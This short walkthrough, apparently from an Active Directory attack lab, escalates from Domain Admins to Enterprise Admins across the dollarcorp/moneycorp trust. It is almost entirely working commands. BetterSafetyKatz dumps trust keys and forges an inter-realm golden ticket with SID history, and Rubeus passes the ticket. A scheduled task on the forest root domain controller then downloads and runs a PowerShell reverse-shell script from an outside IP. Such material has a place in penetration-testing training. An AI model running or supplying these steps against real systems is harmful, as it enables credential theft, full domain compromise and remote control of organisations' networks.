We will explain a way to Escalate From Domain Admins To Enterprise Admins
First Let’s Extract the trust keys using BetterSafetyKatz
.\\BetterSafetyKatz.exe '"lsadump::trust /patch"' "exit"
Now let’s Use BetterSafetyKatz To Forge the Ticket
BetterSafetyKatz.exe '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:68a7f836e94f9668b8a215d486f23a38 /service:krbtgt /ticket:c:\\ad\\tools\\trust.kirbi"' "exit"
Now we got the Ticket saved
Let’s Pass-The-Ticket now using Rubues
Rubeus.exe asktgs /service:http/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ticket:c:\\ad\\tools\\trust.kirbi /ptt
Alright Now let’s try to list our Tickets
klist
Let’s Create Schedule Task to the Moneycorp Domain Controller
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekly /RU "mcorp\\Administrator" /TN "STCheck" /TR "powershell.exe -c 'IEX(New-Object System.Net.WebClient).DownloadString(''<http://172.16.100.22/Invoke-PowerShellTcp.ps1>''')'"
